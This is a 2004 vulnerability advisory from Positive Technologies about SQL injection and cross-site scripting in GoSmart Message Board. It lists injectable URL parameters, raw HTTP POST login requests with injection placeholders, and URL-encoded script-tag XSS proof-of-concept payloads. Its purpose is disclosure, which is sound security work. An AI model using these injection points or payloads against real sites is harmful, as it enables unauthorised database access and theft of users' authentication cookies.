This vulnerability was discovered by Positive Technologies using MaxPatrol (www.maxpatrol.com), an intelligent professional security scanner. It can detect a substantial number of vulnerabilities that have not yet been published. MaxPatrol's intelligent algorithms can also detect many vulnerabilities in custom web scripts (XSS, SQL and code injections, HTTP response splitting).

Date: 11.10.04
Severity: Low
Application: GoSmart Message Board, http://www.gosmart4u.com/forum.aspx
Platform: ASP

I. DESCRIPTION
--------------

Multiple vulnerabilities were found in GoSmart Message Board. A remote user can conduct SQL injection and cross-site scripting attacks.

1. SQL injection (minimal risk, because the application uses an Access database)

messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1&Category=1
messageboard/Forum.asp?Username=&Category=[SQL CODE HERE]
messageboard/Forum.asp?QuestionNumber=[SQL CODE HERE]&Find=1
messageboard/Forum.asp?Category=[SQL CODE HERE]

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=[SQL CODE HERE]&Password=1&Login=1

POST /messageboard/Login_Exec.asp HTTP/1.1
Host: www.gosmart4u.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

Username=1&Password=[SQL CODE HERE]&Login=1

2. XSS:

/messageboard/Forum.asp?QuestionNumber=1&Find=1&Category=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22
/messageboard/ReplyToQuestion.asp?MainMessageID=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E%3C%22

II. IMPACT
----------

A remote user can access the target user's cookies (including authentication cookies). A remote user can cause SQL commands to be executed by the underlying database.

III. SOLUTION
-------------

Not available currently.

IV. VENDOR FIX/RESPONSE
-----------------------

n/a

V. CREDIT
-------------

Positive Technologies (www.ptsecurity.com) is an information security company focused especially on the development of MaxPatrol, a professional security scanner.